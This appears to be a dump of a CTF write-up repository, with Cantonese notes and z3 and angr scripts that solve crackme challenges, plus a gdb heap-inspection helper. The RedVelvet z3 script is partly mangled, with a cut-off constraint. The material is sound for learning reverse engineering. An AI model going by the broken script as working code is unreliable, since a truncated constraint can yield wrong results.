print(flag) 36 | -------------------------------------------------------------------------------- /Tools/SHA2017 asby -PE fuzzing/readme.md: -------------------------------------------------------------------------------- 1 | # Reference 2 | 3 | 1.https://b0tchsec.com/2017/sha2017/asby(https://b0tchsec.com/2017/sha2017/asby) 4 | -------------------------------------------------------------------------------- /Tools/heap.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import re 3 | from gdb import * 4 | 5 | 6 | #from https://youtu.be/qFyoWH_5Clo?t=2827 7 | #source heap.py 8 | #ph command addr 9 | 10 | chunkptr=lookup_type('struct malloc_chunk').pointer() 11 | 12 | class PrintHeap(Command): 13 | 14 | def __init__(self): 15 | super (PrintHeap, self).__init__("ph",COMMAND_USER) 16 
| 17 | def printchunk(self,addr): 18 | chunk=addr.cast(chunkptr).dereference() 19 | prevsize=chunk['prev_size'] 20 | size=chunk['size'] 21 | fd=chunk['fd'] 22 | bk=chunk['bk'] 23 | print ('Chunk @ 0x%x' % (addr)) 24 | 25 | if size&1: 26 | print(' prevsize: (inuse)') 27 | else: 28 | print(' prevsize: %d (0x%x)' % (prevsize,prevsize)) 29 | print(' size: %d (0x%x)'%(size&~7,size)) 30 | print(' fd: 0x%x' % (fd)) 31 | print(' bk: 0x%x' % (bk)) 32 | return chunk 33 | 34 | def printheap(self,addr): 35 | while True: 36 | chunk=self.printchunk(addr) 37 | print('') 38 | size=chunk['size']&~7 39 | if size>10000: 40 | break 41 | addr+=size 42 | 43 | def printbin(self,addr): 44 | b=addr.cast(chunkptr).dereference() 45 | chunk=b['fd'] 46 | while chunk !=addr: 47 | chunk=self. printchunk(chunk)['fd'] 48 | print ('') 49 | 50 | 51 | def invoke(self, arg, from_tty): 52 | args=arg.split() 53 | cmd=args[0] 54 | if len(args)>1: 55 | addr=parse_and_eval(args[1]) 56 | if cmd=='chunk': 57 | self.printchunk(addr) 58 | elif cmd=='mem': 59 | self.printchunk(addr-16) 60 | elif cmd=='heap': 61 | self.printheap(addr) 62 | 63 | ##for printing bin informations 64 | elif cmd=='bin': 65 | self.printheap(addr) 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /Tools/readme.md: -------------------------------------------------------------------------------- 1 | # Tools that built or copied from other writeup 2 | -------------------------------------------------------------------------------- /angr/BugsBunnyCTF 2017 rev150/readme.md: -------------------------------------------------------------------------------- 1 | # BugsBunnyCTF 2017 rev150 2 | 3 | 呢題其實唔難,不過可能有太多io,所以angr解唔到 4 | 5 | Ida Code: 6 | 7 | ```C++ 8 | 9 | { 10 | if ( !numeric(argv[1]) ) 11 | puts(4803080LL); 12 | if ( (unsigned __int8)ksjqdh(argv[1]) 13 | && (unsigned __int8)uiyzr(argv[1]) 14 | && (unsigned __int8)qdsdqq(argv[1]) 15 | && 
(unsigned __int8)euziry(argv[1]) 16 | && (unsigned __int8)mlhkjg(argv[1]) 17 | && (unsigned __int8)sndsqd(argv[1]) 18 | && (unsigned __int8)toyiup(argv[1]) 19 | && (unsigned __int8)huhgeg(argv[1]) 20 | && (unsigned __int8)nvjfkv(argv[1]) 21 | && (unsigned __int8)jncsdkjf(argv[1]) 22 | && (unsigned __int8)ieozau(argv[1]) 23 | && (unsigned __int8)jqsgdd(argv[1]) 24 | && (unsigned __int8)msdlmkfd(argv[1]) 25 | && (unsigned __int8)nhdgrer(argv[1]) 26 | && (unsigned __int8)fs546sdf(argv[1]) 27 | && (unsigned __int8)sdff564sd(argv[1]) 28 | && (unsigned __int8)sdff564s(argv[1]) 29 | && (unsigned __int8)sdff564s7(argv[1]) 30 | && (unsigned __int8)sdff564s8(argv[1]) 31 | && (unsigned __int8)sdff564(argv[1]) 32 | && (unsigned __int8)sdff564g5(argv[1]) 33 | && (unsigned __int8)sdff564g8(argv[1]) 34 | && (unsigned __int8)sdff564k3(argv[1]) ) 35 | { 36 | v3 = argv[1]; 37 | printf(40); 38 | } 39 | 40 | ``` 41 | 42 | 支flag要satisfy呢n個 check statement 43 | 44 | 當然就z3見 45 | 46 | ``` 47 | sat 48 | [p = 7, 49 | k = 9, 50 | n = 9, 51 | d = 1, 52 | e = 3, 53 | j = 7, 54 | o = 5, 55 | i = 5, 56 | s = 1, 57 | b = 2, 58 | f = 7, 59 | l = 0, 60 | q = 8, 61 | a = 4, 62 | g = 2, 63 | r = 8, 64 | t = 2, 65 | c = 8, 66 | h = 4, 67 | m = 3] 68 | ``` 69 | flag:BugsBunny{42813724579039578812} 70 | 71 | 72 | # Remark 73 | 74 | 1.睇其他writeup先發現可以咁入constraint .... 
75 | 76 | ```python 77 | for i in range(20): 78 | 79 | s.append(Int('s['+str(i)+']')) 80 | 81 | ``` 82 | 慘 83 | 84 | 85 | 2.Bitvec is for register ~~~~~~ 86 | 87 | 3.留意divison zero,如果唔係有可能 multiple solution 慘 88 | -------------------------------------------------------------------------------- /angr/BugsBunnyCTF 2017 rev150/rev150: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/BugsBunnyCTF 2017 rev150/rev150 -------------------------------------------------------------------------------- /angr/BugsBunnyCTF 2017 rev150/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | FLAG_LENGTH = 20 4 | 5 | 6 | a=Int('a') 7 | b=Int('b') 8 | c=Int('c') 9 | d=Int('d') 10 | e=Int('e') 11 | f=Int('f') 12 | g=Int('g') 13 | h=Int('h') 14 | i=Int('i') 15 | j=Int('j') 16 | k=Int('k') 17 | l=Int('l') 18 | m=Int('m') 19 | n=Int('n') 20 | o=Int('o') 21 | p=Int('p') 22 | q=Int('q') 23 | r=Int('r') 24 | s=Int('s') 25 | t=Int('t') 26 | 27 | 28 | sol = Solver() 29 | 30 | sol.add(p+e==10) 31 | sol.add(b*s==2) 32 | sol.add(p/j==1) 33 | sol.add(j!=0) 34 | 35 | sol.add(f-r==-1) 36 | sol.add(p-b==5) 37 | sol.add(b*k==18) 38 | sol.add(i+n==14) 39 | sol.add(s*i==5) 40 | sol.add(e*l==0) 41 | sol.add(i+j==12) 42 | sol.add(m-t==1) 43 | sol.add(j%r==7) 44 | sol.add(r!=0) 45 | 46 | sol.add(o*q==40) 47 | sol.add(h-e==1) 48 | sol.add(g+a==6) 49 | sol.add(c-q==0) 50 | sol.add(e-g==1) 51 | sol.add(a%f==4) 52 | sol.add(f!=0) 53 | sol.add(p!=0) 54 | 55 | sol.add(f*l==0) 56 | sol.add(k%p==2) 57 | sol.add(l/d==0) 58 | sol.add(d!=0) 59 | 60 | sol.add(o-n==-4) 61 | sol.add(s+t==3) 62 | 63 | print(sol.check()) 64 | print(sol.model()) 65 | -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/afbea1c0a463d63cd6f00389a3b2fe88: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Codegate_CTF_2018_Preliminary/RedVelvet/afbea1c0a463d63cd6f00389a3b2fe88 -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/byangr.py: -------------------------------------------------------------------------------- 1 | #using posix for question input with fgets ... 2 | import angr 3 | proj = angr.Project('./RedVelvet', auto_load_libs=False) 4 | target=[0x00000000004015F9] 5 | avoid=[0x4009f7,0x4009ed] 6 | st = proj.factory.entry_state() 7 | 8 | for _ in xrange(26): 9 | k = st.posix.files[0].read_from(1) 10 | st.se.add(k != 0) 11 | st.se.add(k != 10) 12 | st.se.add(k>=0x20) 13 | st.se.add(k<=0x7e) 14 | 15 | #constraint last byte as "\n" 16 | k = st.posix.files[0].read_from(1) 17 | st.se.add(k == 10) 18 | 19 | 20 | #constraint size as 27 21 | st.posix.files[0].seek(0) 22 | st.posix.files[0].length = 27 23 | 24 | 25 | pg = proj.factory.path_group(st) 26 | pg.explore(find=target,avoid=avoid) 27 | 28 | print pg.found 29 | 30 | print pg.found[0].posix.dumps(0) 31 | 32 | 33 | 34 | # will got this :What_You_Wanna_Be?:)_lc_la\n but has got one successful run with What_You_Wanna_Be?:)_la_la\n , probably the int overflow issue in func14 affected the sat solver 35 | -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```python 5 | >>> import angr 6 | WARNING | 2018-02-05 10:40:47,352 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups. 
7 | >>> proj = angr.Project('./RedVelvet', auto_load_libs=False) 8 | >>> simgr.explore(find=lambda s: "flag : {" in s.posix.dumps(1)) 9 | Traceback (most recent call last): 10 | File "", line 1, in 11 | NameError: name 'simgr' is not defined 12 | >>> simgr = proj.factory.simgr() 13 | >>> simgr.explore(find=lambda s: "flag : {" in s.posix.dumps(1)) 14 | WARNING | 2018-02-05 10:42:22,015 | angr.engines.successors | Exit state has over 257 possible solutions. Likely unconstrained; skipping. 15 | WARNING | 2018-02-05 10:46:39,689 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing. 16 | 17 | >>> s 18 | Traceback (most recent call last): 19 | File "", line 1, in 20 | NameError: name 's' is not defined 21 | >>> s.found 22 | Traceback (most recent call last): 23 | File "", line 1, in 24 | NameError: name 's' is not defined 25 | >>> s = simgr.found[0] 26 | >>> print s.posix.dumps(1) 27 | Your flag : HAPPINESS:) 28 | HAPPINESS:) 29 | HAPPINESS:) 30 | HAPPINESS:) 31 | HAPPINESS:) 32 | HAPPINESS:) 33 | HAPPINESS:) 34 | HAPPINESS:) 35 | HAPPINESS:) 36 | HAPPINESS:) 37 | HAPPINESS:) 38 | HAPPINESS:) 39 | HAPPINESS:) 40 | HAPPINESS:) 41 | HAPPINESS:) 42 | flag : {" What_You_Wanna_Be?:)_lc_la "} 43 | 44 | >>> flag = s.posix.dumps(0) 45 | >>> print(flag) 46 | What_You_Wanna_Be?:)_lc_la** ��J��??*JJ�* 47 | �*JJJ� 48 | �* 49 | >>> 50 | ``` 51 | -------------------------------------------------------------------------------- /angr/Codegate_CTF_2018_Preliminary/RedVelvet/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | 4 | s = Solver() 5 | 6 | for i in range(0,26): 7 | globals()['v%i' % i] = BitVec('v%i' % i,32) 8 | 9 | #func1(v0, v1); 10 | s.add(v0*2*(v0^v1)-v1==10858) 11 | s.add(v0>85) 12 | s.add(v0<=95) 13 | s.add(v1>96) 14 | s.add(v1<=111) 15 | 16 | #func2(v1, v2); 17 | s.add(v1%v2==7) 18 | s.add(v2>90) 19 | 20 | #func3(v2, v3); 21 | s.add((v2/v3)+(v2^v3)==21) 
22 | s.add(v2<=99) 23 | s.add(v3<=119) 24 | 25 | # # #func4(v3, v4); 26 | s.add((v3%v4)+v3==137) 27 | s.add(v4==95) 28 | 29 | # #func5(v4, v5); 30 | #s.add(((v4+v5)^(v4^v5^v4))==255) < crash here?? 31 | 32 | s.add(v5<=89) 33 | s.add(v5>85) 34 | 35 | #func6(v5, v6, v7); 36 | s.add(v5<=v6) 37 | s.add(v6<=v7) 38 | s.add(v6>110) 39 | s.add(v7>115) 40 | s.add((v6+v7)^(v5+v6)==44) 41 | s.add(((v6+v7)%v5)+v6==161) 42 | 43 | 44 | #func7(v7, v8, v9); 45 | s.add(v7>=v8) 46 | s.add(v8>=v9) 47 | s.add(v7<=119) 48 | s.add(v8>90) 49 | s.add(v9<=89) 50 | s.add((v7+v9)^(v8+v9)==122) 51 | s.add(((v7+v9)%v8)+v9==101) 52 | 53 | 54 | 55 | #func8(v9, v10, v11); 56 | s.add(v9<=v10) 57 | s.add(v10<=v11) 58 | s.add(v11<=114) 59 | s.add(((v9+v10))/v11*v10==97) 60 | s.add((v11^(v9-v10))*v10==-10088) 61 | 62 | 63 | 64 | #func9(v11, v12, v13); 65 | s.add(v11==v12) 66 | s.add(v12>=v13) 67 | s.add(v13<=99) 68 | s.add(v13+(v11*(v13-v12))-v11==-1443) 69 | 70 | 71 | 72 | #func10(v13, v14, v15); 73 | s.add(v13>=v14) 74 | s.add(v14>=v15) 75 | s.add(v14*(v13+v15+1)-v15==15514) 76 | s.add(v14>90) 77 | s.add(v14<=99) 78 | 79 | 80 | 81 | #func11(v15, v16, v17); 82 | s.add(v16>=v15) 83 | s.add(v15>=v17) 84 | s.add(v16>100) 85 | s.add(v16<=104) 86 | s.add(v15+(v16^(v16-v17))-v17==70) 87 | s.add(((v16+v17)/v15)+v15==68) 88 | 89 | 90 | #func12(v17, v18, v19); 91 | s.add(v17>=v18) 92 | s.add(v18>=v19) 93 | s.add(v18<=59) 94 | s.add(v19<=44) 95 | s.add(v17+(v18^(v18+v19))-v19==111) 96 | s.add((v18^(v18-v19))+v18==101) 97 | 98 | 99 | 100 | #func13(v19, v20, v21); 101 | s.add(v19<=v20) 102 | s.add(v20<=v21) 103 | s.add(v19>40) 104 | s.add(v20>90) 105 | s.add(v21<=109) 106 | s.add(v21+(v20^(v21+v19))-v19==269) 107 | s.add((v21^(v20-v19))+v20==185) 108 | 109 | 110 | 111 | #func14(v21, v22, v23); 112 | s.add(v21>=v23) 113 | s.add(v22>=v23) 114 | s.add(v22<=99) 115 | s.add(v23>90) 116 | s.add(v21+(v22^(v22+v21))==185+v23) #=v25) 122 | s.add(v24>=v23) 123 | s.add(v25>95) 124 | s.add(v24<=109) 125 | 
s.add(((v24-v23)*v24^v25)-v23==1214) 126 | s.add(((v25-v24)*v25^v23)+v24==-1034) 127 | 128 | print s.check() 129 | modl=s.model() 130 | res = "" 131 | for i in range(0,26): 132 | obj = globals()['v%i' % i] 133 | c = modl[obj].as_long() 134 | print('v%i: %x' % (i, c)) 135 | res = res + chr(c) 136 | print res 137 | 138 | 139 | print res 140 | -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Google CTF 2016 google2016_unbreakable_0/1.png -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Google CTF 2016 google2016_unbreakable_0/2.png -------------------------------------------------------------------------------- /angr/Google CTF 2016 google2016_unbreakable_0/readme.md: -------------------------------------------------------------------------------- 1 | [Google CTF 2016] google2016 unbreakable 0 2 | =============================================== 3 | 4 | 呢條題目出現係/angr-dev/example 5 | 6 | 直接拎左個binary黎玩 7 | 8 | string length=0x43 9 | 10 | 11 | ![alt text](1.png) 12 | 13 | 14 | address 15 | 16 | ![alt text](2.png) 17 | 18 | 19 | 呢條其實唔難either z3 or angr 20 | 21 | 要注意一個點就係 22 | 23 | ```python 24 | #By default there's only 60 symbolic bytes, which is too small for this case 25 | #This region is tunable in case of any out bound error found 26 | state.libc.buf_symbolic_bytes=str__len +1 27 | #state.libc.buf_symbolic_bytes = 500 28 | ``` 29 | 30 | 自己打完一次,都卡呢個位 31 | 32 | 33 | 34 | 由於pass argv係command line執行,所以要用 35 | 36 | ```python 37 | #use claripy if 
is argv type passing
input_string = angr.claripy.BVS("input_string", 8 * str__len)

state = proj.factory.entry_state(args=["./unbreakable-enterprise-product-activation", input_string], add_options={simuvex.o.LAZY_SOLVES})

```






Reference
==========================
1. Script in angr-dev/example

2. [Z3 solution 1](https://p1kachu.pluggi.fr/writeup/re/2016/05/01/googlectf-unbreakable-writeup/)

3. [Z3 solution 2](http://tkmr.hatenablog.com/entry/2016/08/19/011529)

4. [angr writeup 1](http://hack.carleton.team/2016/05/05/google-ctf-2016-unbreakable-enterprise-product-activation-150-points/)

5. [angr writeup 2](http://yuanvi.cn/2016/05/01/angr-google-ctf)

6. [angr writeup 3](http://www.99cruster.com/blog/2016/05/02/google-ctf-2016-unbreakable-enterprise-product-activation-writeup-using-angr/)

--------------------------------------------------------------------------------
/angr/Google CTF 2016 google2016_unbreakable_0/solve_google_ctf_2016_0.py:
--------------------------------------------------------------------------------
# Python 2 script written against the legacy angr API (simuvex, surveyors,
# state.se); newer angr releases renamed or removed these interfaces.
import angr
import simuvex


# no begin address needed: the input is passed via argv, so we start from the entry point
avoid=0x400850
target=0x400830
str__len=0x43

proj = angr.Project('unbreakable-enterprise-product-activation', load_options={"auto_load_libs": False})


# use a claripy bitvector for the input when it is passed via argv
input_string = angr.claripy.BVS("input_string", 8 * str__len)

state = proj.factory.entry_state(args=["./unbreakable-enterprise-product-activation", input_string], add_options={simuvex.o.LAZY_SOLVES})

# By default there are only 60 symbolic bytes, which is too small for this case.
# This region is tunable in case an out-of-bounds error shows up.
state.libc.buf_symbolic_bytes=str__len +1
#state.libc.buf_symbolic_bytes = 500


# constrain the input to printable characters
for byte in input_string.chop(8):
    state.add_constraints(byte >= ' ') # '\x20'
    state.add_constraints(byte <= '~') # '\x7e'
    state.add_constraints(byte != 0) # null


path = proj.factory.path(state=state)

ex = proj.surveyors.Explorer(start=path, find=target, avoid=avoid)

ex.run()

state = ex.found[0].state


print 'Found:', state.se.any_str(input_string)
--------------------------------------------------------------------------------
/angr/Google CTF 2016 google2016_unbreakable_0/unbreakable-enterprise-product-activation:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/Google CTF 2016 google2016_unbreakable_0/unbreakable-enterprise-product-activation
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/1.png
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/2.png
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/3.png
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/4.png
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/5.png
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/6.png
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/crackme2_fix4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/MeePwn CTF- Missing Hash/crackme2_fix4.exe
--------------------------------------------------------------------------------
/angr/MeePwn CTF- Missing Hash/solve.py:
--------------------------------------------------------------------------------
# Python 2 script written against the legacy angr API (surveyors, state.se).
import angr

# load the binary into an angr project.
proj = angr.Project('crackme2_fix4.exe', load_options={"auto_load_libs": False})
# I'm going to skip all the beginning of the program.
state = proj.factory.entry_state(addr=0x004015B6)

# scanf() reads from stdin and stores it at this address
bind_addr = 0x040305A
# a symbolic input string with a length up to 10 bytes
input_string = state.se.BVS("input_string", 8 * 10)
# To be safe, I'm constraining the input string to printable characters
for byte in input_string.chop(8):
    state.add_constraints(byte >= ' ') # '\x20'
    state.add_constraints(byte <= '~') # '\x7e'
    state.add_constraints(byte != 0) # null

# bind the symbolic string at bind_addr
state.memory.store(bind_addr, input_string)

# Attempt to find a path
path = proj.factory.path(state=state)
#ex = proj.surveyors.Explorer(start=path, find=0x401B21, avoid=0x00401B1)

ex = proj.surveyors.Explorer(start=path, find=0x401B21, avoid=0x00401B13)

ex.run()

state = ex.found[0].state
# We know all the values at: 0x403040, 0x403042, 0x403044, 0x403046, 0x403048, 0x40304A, 0x40304C, 0x40304E, 0x403050
for i in range(18):
    state.add_constraints(state.memory.load(0x408040 + i, 1) == 0)
# We know the flag starts with "Z" and ends with "!"
state.add_constraints(state.memory.load(bind_addr + 9, 1) == '!')
state.add_constraints(state.memory.load(bind_addr, 1) == 'Z')

print 'Found:', state.se.any_str(input_string)
# Zer0C0d3r!
# 2.7s
--------------------------------------------------------------------------------
/angr/VXCTF 2nd Simple REVERSE/readme.md:
--------------------------------------------------------------------------------
# VXCTF 2nd Simple REVERSE

Question:

>Simple REVERSE
>Very simple! Just brute-force it!
>
>[rev](rev)


First, open it in IDA.

```C++
scanf("%39s", &s, envp);
if ( strlen(&s) > 0x26
  && v16 + 2 * s + 8 * v42 == 954
  && v12 + 2 * v5 + 2 * v16 == 416
  && s + 5 * v42 == 554
  && v37 + 3 * v20 - v39 == 137
  && v36 + v38 - v20 == 102
  && 2 * (v41 + v42 + v40) == 628
  && v26 + v24 + v14 - v32 == 180
  && v36 + v39 + v20 == 213
  && v10 - v27 + v30 == 66
  && 2 * v10 - v31 == 1
  && v23 + v41 == 210
  && v6 - v8 + v18 == 95
  && v7 + v28 == 228
  && v27 - v10 == 50
  && v19 + v5 + v39 == 335
  && v5 + 3 * v39 == 435
  && v19 - v5 + v28 == 131
  && v9 - v5 + v28 == 109
  && 2 * v39 + v32 == 320
  && 4 * v15 - v11 - v18 - v21 == 140
  && v8 + 3 * v33 == 437
  && v17 + v11 + v18 == 324
  && v22 + v33 == 218
  && v17 + v21 + v41 == 313
  && v11 + v41 == 209
  && v17 + v11 - v22 == 125
  && 3 * (v26 + v10) + v32 == 398
  && v22 + v10 + v26 == 204
  && v24 + v40 == 233
  && v11 - v22 == 6
  && v25 == v31
  && 2 * v24 - v10 == 190
  && v31 + 2 * v22 + 2 * v35 == 535
  && v35 + v22 + v36 == 271
  && v34 + v22 - v36 == 170
  && v29 - v34 + v36 == 51
  && v41 + v34 + v23 - v29 - 2 * v13 == 20
  && v34 + 2 * v13 - v23 - v41 == 97
  && v34 + 2 * v10 - v31 == 118 )
{
  puts("Congratulations!");
  result = 0;
}
else
{
  puts("Bye~");
  result = 0;
}
return result;
```

The condition is simple: enter the right flag and it prints "Congratulations!".

So I typed the constraints into the z3 solver.

After solving it, harry told me that with globals you don't have to declare the constraint variables by hand -_-

Here I record harry's solution.

[solve.py](solve.py)
--------------------------------------------------------------------------------
/angr/VXCTF 2nd Simple REVERSE/rev:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/VXCTF 2nd Simple REVERSE/rev
--------------------------------------------------------------------------------
/angr/VXCTF 2nd Simple REVERSE/solve.py:
--------------------------------------------------------------------------------
from z3 import *


s = Solver()
# create v4..v42 as z3 Ints in the module namespace so the constraints below
# can use them directly; the decompiler's `s` is v4
for i in range(4,43):
    globals()['v%i' % i] = Int('v%i' % i)

s.add(And(v16 + 2 * v4 + 8 * v42 == 954
, v12 + 2 * v5 + 2 * v16 == 416
, v4 + 5 * v42 == 554
, v37 + 3 * v20 - v39 == 137
, v36 + v38 - v20 == 102
, 2 * (v41 + v42 + v40) == 628
, v26 + v24 + v14 - v32 == 180
, v36 + v39 + v20 == 213
, v10 - v27 + v30 == 66
, 2 * v10 - v31 == 1
, v23 + v41 == 210
, v6 - v8 + v18 == 95
, v7 + v28 == 228
, v27 - v10 == 50
, v19 + v5 + v39 == 335
, v5 + 3 * v39 == 435
, v19 - v5 + v28 == 131
, v9 - v5 + v28 == 109
, 2 * v39 + v32 == 320
, 4 * v15 - v11 - v18 - v21 == 140
, v8 + 3 * v33 == 437
, v17 + v11 + v18 == 324
, v22 + v33 == 218
, v17 + v21 + v41 == 313
, v11 + v41 == 209
, v17 + v11 - v22 == 125
, 3 * (v26 + v10) + v32 == 398
, v22 + v10 + v26 == 204
, v24 + v40 == 233
, v11 - v22 == 6
, v25 == v31
, 2 * v24 - v10 == 190
, v31 + 2 * v22 + 2 * v35 == 535
, v35 + v22 + v36 == 271
, v34 + v22 - v36 == 170
, v29 - v34 + v36 == 51
, v41 + v34 + v23 - v29 - 2 * v13 == 20
, v34 + 2 * v13 - v23 - v41 == 97
, v34 + 2 * v10 - v31 == 118 ))
if s.check() == sat:
    print(s.model())
--------------------------------------------------------------------------------
/angr/cmu_bomb_lab_ref/bomb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr/cmu_bomb_lab_ref/bomb
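The VXCTF check above can also be solved without z3: the 39 comparisons are linear in the 39 input bytes, so they can be parsed straight out of the decompiler text and solved exactly. This is an added example, not harry's solve.py or anything from the original repo; the condition list is a constructed copy of the IDA output, `s` is mapped to v4 as in solve.py, and the parser and solver names are my own.

```python
"""Solve the VXCTF 'Simple REVERSE' check with exact linear algebra (added example).

The 39 comparisons IDA prints are linear in the 39 input bytes (`s` is byte 0,
renamed v4 as in harry's solve.py; v5..v42 follow), so the decompiler text can be
parsed directly and solved by Gauss-Jordan elimination over rationals, no z3 needed.
"""
import re
from fractions import Fraction

# Constructed copy of the equalities from the IDA pseudocode, ';'-separated.
IDA_CONDITIONS = """
v16 + 2 * s + 8 * v42 == 954; v12 + 2 * v5 + 2 * v16 == 416; s + 5 * v42 == 554
v37 + 3 * v20 - v39 == 137; v36 + v38 - v20 == 102; 2 * (v41 + v42 + v40) == 628
v26 + v24 + v14 - v32 == 180; v36 + v39 + v20 == 213; v10 - v27 + v30 == 66
2 * v10 - v31 == 1; v23 + v41 == 210; v6 - v8 + v18 == 95; v7 + v28 == 228
v27 - v10 == 50; v19 + v5 + v39 == 335; v5 + 3 * v39 == 435; v19 - v5 + v28 == 131
v9 - v5 + v28 == 109; 2 * v39 + v32 == 320; 4 * v15 - v11 - v18 - v21 == 140
v8 + 3 * v33 == 437; v17 + v11 + v18 == 324; v22 + v33 == 218; v17 + v21 + v41 == 313
v11 + v41 == 209; v17 + v11 - v22 == 125; 3 * (v26 + v10) + v32 == 398
v22 + v10 + v26 == 204; v24 + v40 == 233; v11 - v22 == 6; v25 == v31
2 * v24 - v10 == 190; v31 + 2 * v22 + 2 * v35 == 535; v35 + v22 + v36 == 271
v34 + v22 - v36 == 170; v29 - v34 + v36 == 51; v41 + v34 + v23 - v29 - 2 * v13 == 20
v34 + 2 * v13 - v23 - v41 == 97; v34 + 2 * v10 - v31 == 118
"""

VARS = ["v%d" % i for i in range(4, 43)]        # the 39 input bytes
TOKEN = re.compile(r"\d+|[a-z]\w*|[()+*-]")

def _expr(tok, pos):
    """expr := term (('+'|'-') term)*  ->  ({var: coeff, '': constant}, next pos)."""
    acc, pos = _term(tok, pos)
    while pos < len(tok) and tok[pos] in "+-":
        sign = 1 if tok[pos] == "+" else -1
        rhs, pos = _term(tok, pos + 1)
        for k, v in rhs.items():
            acc[k] = acc.get(k, 0) + sign * v
    return acc, pos

def _term(tok, pos):
    """term := factor ('*' factor)*; one side of each '*' must be a constant."""
    acc, pos = _factor(tok, pos)
    while pos < len(tok) and tok[pos] == "*":
        rhs, pos = _factor(tok, pos + 1)
        const, other = (acc, rhs) if set(acc) <= {""} else (rhs, acc)
        if not set(const) <= {""}:
            raise ValueError("non-linear product in condition")
        acc = {k: v * const.get("", 0) for k, v in other.items()}
    return acc, pos

def _factor(tok, pos):
    """factor := number | variable | '(' expr ')'; IDA's `s` is byte v4."""
    if tok[pos] == "(":
        acc, pos = _expr(tok, pos + 1)
        return acc, pos + 1                         # skip the closing ')'
    if tok[pos].isdigit():
        return {"": Fraction(tok[pos])}, pos + 1
    return {"v4" if tok[pos] == "s" else tok[pos]: Fraction(1)}, pos + 1

def parse_condition(text):
    """'lhs == rhs'  ->  (coefficient row over VARS, constant) meaning row . x == constant."""
    lhs, rhs = [_expr(TOKEN.findall(side), 0)[0] for side in text.split("==")]
    row = [lhs.get(v, 0) - rhs.get(v, 0) for v in VARS]
    return row, rhs.get("", 0) - lhs.get("", 0)

def conditions(text=IDA_CONDITIONS):
    return [c.strip() for c in re.split(r"[;\n]", text) if c.strip()]

def solve_flag(text=IDA_CONDITIONS):
    """Gauss-Jordan over Fractions.  Returns the input string, or None when the
    system is inconsistent, leaves a byte undetermined, or yields a non-printable byte."""
    rows = [row + [const] for row, const in map(parse_condition, conditions(text))]
    n = len(VARS)
    for col in range(n):
        piv = next((r for r in range(col, len(rows)) if rows[r][col] != 0), None)
        if piv is None:
            return None                             # this byte is not pinned down
        rows[col], rows[piv] = rows[piv], rows[col]
        p = rows[col][col]
        rows[col] = [x / p for x in rows[col]]
        for r in range(len(rows)):
            if r != col and rows[r][col] != 0:
                f = rows[r][col]
                rows[r] = [a - f * b for a, b in zip(rows[r], rows[col])]
    if any(row[-1] != 0 for row in rows[n:]):
        return None                                 # leftover row reads 0 == nonzero
    values = [Fraction(rows[i][-1]) for i in range(n)]
    if any(v.denominator != 1 or not 0x20 <= v <= 0x7e for v in values):
        return None
    return "".join(chr(int(v)) for v in values)

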